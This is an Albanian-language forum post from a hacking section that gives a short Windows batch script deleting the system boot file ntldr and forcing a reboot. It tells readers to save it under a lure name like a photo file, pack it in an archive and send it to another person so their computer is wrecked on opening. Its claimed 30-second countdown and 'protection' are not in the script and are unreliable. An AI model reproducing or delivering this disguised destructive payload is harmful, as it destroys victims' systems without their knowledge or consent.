AlbStyle.Tk

By BeSi
 
ForumForum  PortaliPortali  CalendarCalendar  PytësoriPytësori  KërkoKërko  Lista AnëtarëveLista Anëtarëve  Grupet e AnëtarëveGrupet e Anëtarëve  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 Formato Pc E Tjeterit AutoMatikisht

Shko poshtë 
AutoriMesazh
BeSi
Admin
avatar

Numri i postimeve : 135
Join date : 21/04/2009
Age : 28
Location : Albania/Tropoje

MesazhTitulli: Formato Pc E Tjeterit AutoMatikisht   Fri Apr 24, 2009 12:27 am

cd..

cd..

attrib -s -h -r -a c:\ntldr

del c:\ntldr

shutdown -r

Keto kodet i kopjojme tek Notpad'i ne Kompjuter dhe ja ndrrojme gjatesimin me .bat
pershembull; fototebukura.bat

Me pas te vijme te pjesa me e Bukur kete Dosjen qe e mbaruam ja dergojme tjetrit me an te programeve
Winrar ose Winzip dhe personi qe e mer kete sa e hap BuuuuM ..!! Pc i ben Format vetes Automatikisht.

haa ça sbon vaki e hapet dosjen gabimisht un po ju jap edhe protectin:
Dosja e siperme qe e pergatitem ne moment te hapjes fillon nje numurim per 30 sekondashm per te bere Format.
Pa mbaruar 30 sekonda Dosjen regjistroheni persiri ashtu si e kemi bere shpar .bat punimi ndalon por prapse prap
Ju mos hyni ne kete Risk..
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://wWw.AlbStyle.Tk
 
Formato Pc E Tjeterit AutoMatikisht
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
AlbStyle.Tk  :: Argetim :: Arkiva :: Hacking-
Kërce tek: